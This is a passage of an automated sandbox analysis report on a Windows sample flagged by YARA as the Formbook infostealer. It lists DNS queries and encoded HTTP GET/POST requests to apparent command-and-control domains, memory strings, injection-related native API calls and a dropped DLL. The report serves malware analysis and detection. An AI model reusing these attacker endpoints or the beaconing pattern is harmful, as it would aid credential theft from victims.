            Source: global trafficHTTP traffic detected: GET /rmem/?o0I8bJWh=3mrg4OdF971xdpR9JqOipvCghMgMNm9pdqQXdKBxeUX/uUFHRyFRUgP+leOKIhGfNBOtjijimK07Q8HHjxhFaJ4HohJ/XqsVK02RuScXQBf97wXpW/1str23dyM9&IzCDX=JREpwHC8S HTTP/1.1Host: www.asiapartnars.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /v5ff/?o0I8bJWh=6KtkYrJQJQPjnaYYjYn2UYf3+tCUC2UyI0IqyotYPNah/j4zRWdFJ7rRvhmSGGewLKOTJjNwEsTAi0VkpGXovzF7okvrkNx58uXZpArpUgDeiKoUGkOd+5nnUTXs&IzCDX=JREpwHC8S HTTP/1.1Host: www.wdgb23.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /0l08/?o0I8bJWh=WYzw3m0wqer1rwFfiUwXr6rnqmqwc587r0oEUdRC5DK7wXWam3jpYKn/a30V+PURl6w9nm91Zal+YxrVMngOiDDKZET7LCtjetsFGO1YqrEJE528b4AnIbgsZ84h&IzCDX=JREpwHC8S HTTP/1.1Host: www.childlesscatlady.todayAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36
            Source: ekte.exe, 00000000.00000002.375617011.000000000075D000.00000004.00000020.00020000.00000000.sdmp, eFDiSxeTfjUqTk.exe, 0000000A.00000002.409649909.00000000004EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
            Source: global trafficDNS traffic detected: DNS query: www.deikamalaharris.info
            Source: global trafficDNS traffic detected: DNS query: www.sqlite.org
            Source: global trafficDNS traffic detected: DNS query: www.rockbull.pro
            Source: global trafficDNS traffic detected: DNS query: www.timetime.store
            Source: global trafficDNS traffic detected: DNS query: www.guldeu.xyz
            Source: global trafficDNS traffic detected: DNS query: www.asiapartnars.online
            Source: global trafficDNS traffic detected: DNS query: www.wdgb23.top
            Source: global trafficDNS traffic detected: DNS query: www.childlesscatlady.today
            Source: global trafficDNS traffic detected: DNS query: www.martaschrimpf.info
            Source: unknownHTTP traffic detected: POST /0804/ HTTP/1.1Host: www.rockbull.proAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflateOrigin: http://www.rockbull.proContent-Length: 2165Content-Type: application/x-www-form-urlencodedCache-Control: max-age=0Connection: closeReferer: http://www.rockbull.pro/0804/User-Agent: Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeDate: Mon, 21 Oct 2024 11:15:25 GMTContent-type: text/html; charset=utf-8Data Ascii: <html><head><title lineno="380">Not Found</title></head><body><h1>Document Not Found</h1>The document /2021/sqlite-dll-win32-x86-3340000.zip is not available on this server</body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closex-powered-by: PHP/8.1.29expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0content-type: text/html; charset=UTF-8link: <https://rockbull.pro/wp-json/>; rel="https://api.w.org/"transfer-encoding: chunkedcontent-encoding: gzipvary: Accept-Encodingdate: Mon, 21 Oct 2024 11:15:36 GMTserver: LiteSpeed
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closex-powered-by: PHP/8.1.29expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0content-type: text/html; charset=UTF-8link: <https://rockbull.pro/wp-json/>; rel="https://api.w.org/"transfer-encoding: chunkedcontent-encoding: gzipvary: Accept-Encodingdate: Mon, 21 Oct 2024 11:15:39 GMTserver: LiteSpeed
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closex-powered-by: PHP/8.1.29expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0content-type: text/html; charset=UTF-8link: <https://rockbull.pro/wp-json/>; rel="https://api.w.org/"transfer-encoding: chunkedcontent-encoding: gzipvary: Accept-Encodingdate: Mon, 21 Oct 2024 11:15:41 GMTserver: LiteSpeed
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 21 Oct 2024 11:15:58 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 21 Oct 2024 11:16:00 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 21 Oct 2024 11:16:03 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 21 Oct 2024 11:16:07 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 21 Oct 2024 11:16:26 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "66ad66a8-8a"Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 21 Oct 2024 11:16:28 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "66ad66a8-8a"Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 21 Oct 2024 11:16:31 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "66ad66a8-8a"Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 21 Oct 2024 11:16:34 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "66ad66a8-8a"Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: ekte.exe, 00000000.00000002.375617011.000000000075D000.00000004.00000020.00020000.00000000.sdmp, eFDiSxeTfjUqTk.exe, 0000000A.00000002.409649909.00000000004EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
            Source: eFDiSxeTfjUqTk.exe, 0000000A.00000002.409649909.00000000004EE000.00000004.00000020.00020000.00000000.sdmp, findstr.exe, 00000013.00000002.627150947.00000000029DC000.00000004.10000000.00040000.00000000.sdmp, BuhvZTwGQCD.exe, 00000014.00000002.626948129.0000000002BAC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000017.00000002.476232018.000000000150C000.00000004.80000000.00040000.00000000.sdmp, ekte.exe, eFDiSxeTfjUqTk.exe.0.drString found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
            Source: ekte.exe, eFDiSxeTfjUqTk.exe.0.drString found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
            Source: ekte.exe, 00000000.00000002.375617011.000000000075D000.00000004.00000020.00020000.00000000.sdmp, eFDiSxeTfjUqTk.exe, 0000000A.00000002.409649909.00000000004EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
            Source: ekte.exe, 00000000.00000002.375617011.000000000075D000.00000004.00000020.00020000.00000000.sdmp, eFDiSxeTfjUqTk.exe, 0000000A.00000002.409649909.00000000004EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
            Source: ekte.exe, 00000000.00000002.375617011.000000000075D000.00000004.00000020.00020000.00000000.sdmp, eFDiSxeTfjUqTk.exe, 0000000A.00000002.409649909.00000000004EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
            Source: ekte.exe, 00000000.00000002.375617011.000000000075D000.00000004.00000020.00020000.00000000.sdmp, eFDiSxeTfjUqTk.exe, 0000000A.00000002.409649909.00000000004EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
            Source: ekte.exe, 00000000.00000002.375617011.000000000075D000.00000004.00000020.00020000.00000000.sdmp, eFDiSxeTfjUqTk.exe, 0000000A.00000002.409649909.00000000004EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
            Source: ekte.exe, 00000000.00000002.375617011.000000000075D000.00000004.00000020.00020000.00000000.sdmp, eFDiSxeTfjUqTk.exe, 0000000A.00000002.409649909.00000000004EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
            Source: ekte.exe, eFDiSxeTfjUqTk.exe.0.drString found in binary or memory: http://ocsp.comodoca.com0
            Source: ekte.exe, 00000000.00000002.375617011.000000000075D000.00000004.00000020.00020000.00000000.sdmp, eFDiSxeTfjUqTk.exe, 0000000A.00000002.409649909.00000000004EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
            Source: ekte.exe, 00000000.00000002.375617011.000000000075D000.00000004.00000020.00020000.00000000.sdmp, eFDiSxeTfjUqTk.exe, 0000000A.00000002.409649909.00000000004EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
            Source: ekte.exe, 00000000.00000002.375617011.000000000075D000.00000004.00000020.00020000.00000000.sdmp, eFDiSxeTfjUqTk.exe, 0000000A.00000002.409649909.00000000004EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
            Source: ekte.exe, 00000000.00000002.375617011.000000000075D000.00000004.00000020.00020000.00000000.sdmp, eFDiSxeTfjUqTk.exe, 0000000A.00000002.409649909.00000000004EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com05
            Source: ekte.exe, 00000000.00000002.375617011.000000000075D000.00000004.00000020.00020000.00000000.sdmp, eFDiSxeTfjUqTk.exe, 0000000A.00000002.409649909.00000000004EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net03
            Source: ekte.exe, 00000000.00000002.375617011.000000000075D000.00000004.00000020.00020000.00000000.sdmp, eFDiSxeTfjUqTk.exe, 0000000A.00000002.409649909.00000000004EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net0D
            Source: findstr.exe, 00000013.00000002.627150947.0000000002F56000.00000004.10000000.00040000.00000000.sdmp, BuhvZTwGQCD.exe, 00000014.00000002.626948129.0000000003126000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://rockbull.pro/0804/?o0I8bJWh=7cQ5BE5RBCqgXF7xrBGoHohDXivjQLfe2KgDJ9LuiE6tpBU04a3sAbwq5Q7Yjj3Jj
            Source: ekte.exe, 00000000.00000002.376498845.000000000290A000.00000004.00000800.00020000.00000000.sdmp, eFDiSxeTfjUqTk.exe, 0000000A.00000002.409956396.00000000023BE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: BuhvZTwGQCD.exe, 00000014.00000002.626793041.0000000000654000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.childlesscatlady.today
            Source: BuhvZTwGQCD.exe, 00000014.00000002.626793041.0000000000654000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.childlesscatlady.today/0l08/
            Source: ekte.exe, 00000000.00000002.375617011.000000000075D000.00000004.00000020.00020000.00000000.sdmp, eFDiSxeTfjUqTk.exe, 0000000A.00000002.409649909.00000000004EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
            Source: ekte.exe, 00000000.00000002.375617011.000000000075D000.00000004.00000020.00020000.00000000.sdmp, eFDiSxeTfjUqTk.exe, 0000000A.00000002.409649909.00000000004EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
            Source: findstr.exe, 00000013.00000002.628010862.0000000061EA3000.00000008.00000001.01000000.0000000D.sdmp, sqlite3.dll.19.drString found in binary or memory: http://www.sqlite.org/copyright.html.
            Source: findstr.exe, 00000013.00000003.464119526.0000000005F9A000.00000004.00000020.00020000.00000000.sdmp, 6z95F416.19.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: findstr.exe, 00000013.00000003.464119526.0000000005F9A000.00000004.00000020.00020000.00000000.sdmp, 6z95F416.19.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: findstr.exe, 00000013.00000003.464119526.0000000005F9A000.00000004.00000020.00020000.00000000.sdmp, 6z95F416.19.drString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: findstr.exe, 00000013.00000003.464119526.0000000005F9A000.00000004.00000020.00020000.00000000.sdmp, 6z95F416.19.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: findstr.exe, 00000013.00000003.464119526.0000000005F9A000.00000004.00000020.00020000.00000000.sdmp, 6z95F416.19.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: findstr.exe, 00000013.00000003.464119526.0000000005F9A000.00000004.00000020.00020000.00000000.sdmp, 6z95F416.19.drString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
            Source: findstr.exe, 00000013.00000003.464119526.0000000005F9A000.00000004.00000020.00020000.00000000.sdmp, 6z95F416.19.drString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: ekte.exe, 00000000.00000002.375617011.000000000075D000.00000004.00000020.00020000.00000000.sdmp, eFDiSxeTfjUqTk.exe, 0000000A.00000002.409649909.00000000004EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
            Source: findstr.exe, 00000013.00000002.627150947.00000000029DC000.00000004.10000000.00040000.00000000.sdmp, BuhvZTwGQCD.exe, 00000014.00000002.626948129.0000000002BAC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000017.00000002.476232018.000000000150C000.00000004.80000000.00040000.00000000.sdmp, ekte.exe, eFDiSxeTfjUqTk.exe.0.drString found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0
            Source: 6z95F416.19.drString found in binary or memory: https://www.google.com/favicon.ico

            E-Banking Fraud

            Source: Yara matchFile source: 8.2.ekte.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.ekte.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000013.00000002.626531753.00000000000E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.417743791.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.416525445.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000002.476152152.0000000000210000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000013.00000002.626483718.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000002.626793041.0000000000600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000013.00000002.626660475.0000000000220000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.626744301.0000000002980000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.419884828.0000000001490000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

            System Summary

            Source: 8.2.ekte.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: Windows_Trojan_Formbook_1112e116; Author: unknown
            Source: 8.2.ekte.exe.400000.0.raw.unpack, type: UNPACKEDPE; Matched rule: Windows_Trojan_Formbook_1112e116; Author: unknown
            Source: 00000013.00000002.626531753.00000000000E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Formbook_1112e116; Author: unknown
            Source: 00000008.00000002.417743791.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Formbook_1112e116; Author: unknown
            Source: 00000008.00000002.416525445.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Formbook_1112e116; Author: unknown
            Source: 00000017.00000002.476152152.0000000000210000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Formbook_1112e116; Author: unknown
            Source: 00000013.00000002.626483718.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Formbook_1112e116; Author: unknown
            Source: 00000014.00000002.626793041.0000000000600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Formbook_1112e116; Author: unknown
            Source: 00000013.00000002.626660475.0000000000220000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Formbook_1112e116; Author: unknown
            Source: 0000000F.00000002.626744301.0000000002980000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Formbook_1112e116; Author: unknown
            Source: 00000008.00000002.419884828.0000000001490000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Formbook_1112e116; Author: unknown
            Source: C:\Users\user\Desktop\ekte.exe; Memory allocated: 770B0000 page execute and read and write
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe; Memory allocated: 770B0000 page execute and read and write
            Source: C:\Users\user\Desktop\ekte.exe; Code function: 8_2_0042C483 NtClose
            Source: C:\Users\user\Desktop\ekte.exe; Code function: 8_2_009B07AC NtCreateMutant, LdrInitializeThunk
            Source: C:\Users\user\Desktop\ekte.exe; Code function: 8_2_009AF9F0 NtClose, LdrInitializeThunk
            Source: C:\Users\user\Desktop\ekte.exe; Code function: 8_2_009AFAE8 NtQueryInformationProcess, LdrInitializeThunk
            Source: C:\Users\user\Desktop\ekte.exe; Code function: 8_2_009AFB68 NtFreeVirtualMemory, LdrInitializeThunk
            Source: C:\Users\user\Desktop\ekte.exe; Code function: 8_2_009AFDC0 NtQuerySystemInformation, LdrInitializeThunk
            Source: C:\Users\user\Desktop\ekte.exe; Code function: 8_2_009B00C4 NtCreateFile
            Source: C:\Users\user\Desktop\ekte.exe; Code function: 8_2_009B0048 NtProtectVirtualMemory
            Source: C:\Users\user\Desktop\ekte.exe; Code function: 8_2_009B0078 NtResumeThread
            Source: C:\Users\user\Desktop\ekte.exe; Code function: 8_2_009B0060 NtQuerySection
            Source: C:\Users\user\Desktop\ekte.exe; Code function: 8_2_009B01D4 NtSetValueKey
            Source: C:\Users\user\Desktop\ekte.exe; Code function: 8_2_009B010C NtOpenDirectoryObject
            Source: C:\Users\user\Desktop\ekte.exe; Code function: 8_2_009B0C40 NtGetContextThread
            Source: C:\Users\user\Desktop\ekte.exe; Code function: 8_2_009B10D0 NtOpenProcessToken
            Source: C:\Users\user\Desktop\ekte.exe; Code function: 8_2_009B1148 NtOpenThread
            Source: C:\Users\user\Desktop\ekte.exe; Code function: 8_2_009AF8CC NtWaitForSingleObject
            Source: C:\Users\user\Desktop\ekte.exe; Code function: 8_2_009AF900 NtReadFile
            Source: C:\Users\user\Desktop\ekte.exe; Code function: 8_2_009AF938 NtWriteFile
            Source: C:\Users\user\Desktop\ekte.exe; Code function: 8_2_009B1930 NtSetContextThread
            Source: C:\Users\user\Desktop\ekte.exe; Code function: 8_2_009AFAB8 NtQueryValueKey
            Source: C:\Users\user\Desktop\ekte.exe; Code function: 8_2_009AFAD0 NtAllocateVirtualMemory
            Source: C:\Users\user\Desktop\ekte.exe; Code function: 8_2_009AFA20 NtQueryInformationFile
            Source: C:\Users\user\Desktop\ekte.exe; Code function: 8_2_009AFA50 NtEnumerateValueKey
            Source: C:\Users\user\Desktop\ekte.exe; Code function: 8_2_009AFBB8 NtQueryInformationToken
            Source: C:\Users\user\Desktop\ekte.exe; Code function: 8_2_009AFBE8 NtQueryVirtualMemory
            Source: C:\Users\user\Desktop\ekte.exe; Code function: 8_2_009AFB50 NtCreateKey
            Source: C:\Users\user\Desktop\ekte.exe; Code function: 8_2_009AFC90 NtUnmapViewOfSection
            Source: C:\Users\user\Desktop\ekte.exe; Code function: 8_2_009AFC30 NtOpenProcess
            Source: C:\Users\user\Desktop\ekte.exe; Code function: 8_2_009AFC48 NtSetInformationFile
            Source: C:\Users\user\Desktop\ekte.exe; Code function: 8_2_009AFC60 NtMapViewOfSection
            Source: C:\Users\user\Desktop\ekte.exe; Code function: 8_2_009AFD8C NtDelayExecution
            Source: C:\Users\user\Desktop\ekte.exe; Code function: 8_2_009B1D80 NtSuspendThread
            Source: C:\Users\user\Desktop\ekte.exe; Code function: 8_2_009AFD5C NtEnumerateKey
            Source: C:\Users\user\Desktop\ekte.exe; Code function: 8_2_009AFEA0 NtReadVirtualMemory
            Source: C:\Users\user\Desktop\ekte.exe; Code function: 8_2_009AFED0 NtAdjustPrivilegesToken
            Source: C:\Users\user\Desktop\ekte.exe; Code function: 8_2_009AFE24 NtWriteVirtualMemory
            Source: C:\Users\user\Desktop\ekte.exe; Code function: 8_2_009AFFB4 NtCreateSection
            Source: C:\Users\user\Desktop\ekte.exe; Code function: 8_2_009AFFFC NtCreateProcessEx
            Source: C:\Users\user\Desktop\ekte.exe; Code function: 8_2_009AFF34 NtQueueApcThread
            Source: Joe Sandbox View; Dropped File: C:\Users\user\AppData\Local\Temp\sqlite3.dll 5EA67D6B7F67301CA214AF511740F26B9E6CC9E16B2C0EC7BBA071D05B9BDE78
            Source: C:\Users\user\Desktop\ekte.exe; Code function: String function: 009BDF5C appears 137 times
            Source: C:\Users\user\Desktop\ekte.exe; Code function: String function: 00A03F92 appears 132 times
            Source: C:\Users\user\Desktop\ekte.exe; Code function: String function: 009BE2A8 appears 60 times
            Source: C:\Users\user\Desktop\ekte.exe; Code function: String function: 00A0373B appears 253 times
            Source: C:\Users\user\Desktop\ekte.exe; Code function: String function: 00A2F970 appears 84 times
            Source: ekte.exe; Static PE information: invalid certificate
            Source: sqlite3.dll.19.dr; Static PE information: Number of sections : 18 > 10
            Source: ekte.exe, 00000000.00000000.359787899.0000000001482000.00000002.00000001.01000000.00000003.sdmp; Binary or memory string: OriginalFilenameiKZ.exe@ vs ekte.exe
            Source: ekte.exe, 00000000.00000002.383376201.00000000052AE000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: OriginalFilenamesctasks.exej% vs ekte.exe
            Source: ekte.exe, 00000000.00000002.375617011.00000000006D4000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: OriginalFilenameclr.dllT vs ekte.exe
            Source: ekte.exe, 00000000.00000002.383837466.00000000067B0000.00000004.08000000.00040000.00000000.sdmp; Binary or memory string: OriginalFilenameTyrone.dll8 vs ekte.exe
            Source: ekte.exe, 00000000.00000002.376498845.0000000002891000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: OriginalFilename vs ekte.exe
            Source: ekte.exe, 00000008.00000002.418645615.0000000000AA0000.00000040.00001000.00020000.00000000.sdmp; Binary or memory string: OriginalFilenamentdll.dllj% vs ekte.exe
            Source: ekte.exe, 00000008.00000002.417831173.00000000008C6000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: OriginalFilenameFINDSTR.EXEj% vs ekte.exe
            Source: ekte.exe, 00000008.00000002.417831173.00000000008D7000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: OriginalFilenameFINDSTR.EXEj% vs ekte.exe
            Source: ekte.exe; Binary or memory string: OriginalFilenameiKZ.exe@ vs ekte.exe
            Source: ekte.exe; Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: 8.2.ekte.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: Windows_Trojan_Formbook_1112e116; reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: ekte.exe; Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: eFDiSxeTfjUqTk.exe.0.dr; Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: 0.2.ekte.exe.3ae7ae0.5.raw.unpack, GU2SbFu6vnjS2UV3A6.cs; Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 0.2.ekte.exe.3ae7ae0.5.raw.unpack, GU2SbFu6vnjS2UV3A6.cs; Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.ekte.exe.67b0000.6.raw.unpack, GU2SbFu6vnjS2UV3A6.cs; Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 0.2.ekte.exe.67b0000.6.raw.unpack, GU2SbFu6vnjS2UV3A6.cs; Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.ekte.exe.3ae7ae0.5.raw.unpack, fQtca1ae8ISaTu4jS6.cs; Security API names: _0020.SetAccessControl
            Source: 0.2.ekte.exe.3ae7ae0.5.raw.unpack, fQtca1ae8ISaTu4jS6.cs; Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.ekte.exe.3ae7ae0.5.raw.unpack, fQtca1ae8ISaTu4jS6.cs; Security API names: _0020.AddAccessRule
            Source: 0.2.ekte.exe.3b6fb00.4.raw.unpack, fQtca1ae8ISaTu4jS6.cs; Security API names: _0020.SetAccessControl
            Source: 0.2.ekte.exe.3b6fb00.4.raw.unpack, fQtca1ae8ISaTu4jS6.cs; Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.ekte.exe.3b6fb00.4.raw.unpack, fQtca1ae8ISaTu4jS6.cs; Security API names: _0020.AddAccessRule
            Source: 0.2.ekte.exe.67b0000.6.raw.unpack, fQtca1ae8ISaTu4jS6.cs; Security API names: _0020.SetAccessControl
            Source: 0.2.ekte.exe.67b0000.6.raw.unpack, fQtca1ae8ISaTu4jS6.cs; Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.ekte.exe.67b0000.6.raw.unpack, fQtca1ae8ISaTu4jS6.cs; Security API names: _0020.AddAccessRule
            Source: 0.2.ekte.exe.3b6fb00.4.raw.unpack, GU2SbFu6vnjS2UV3A6.cs; Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
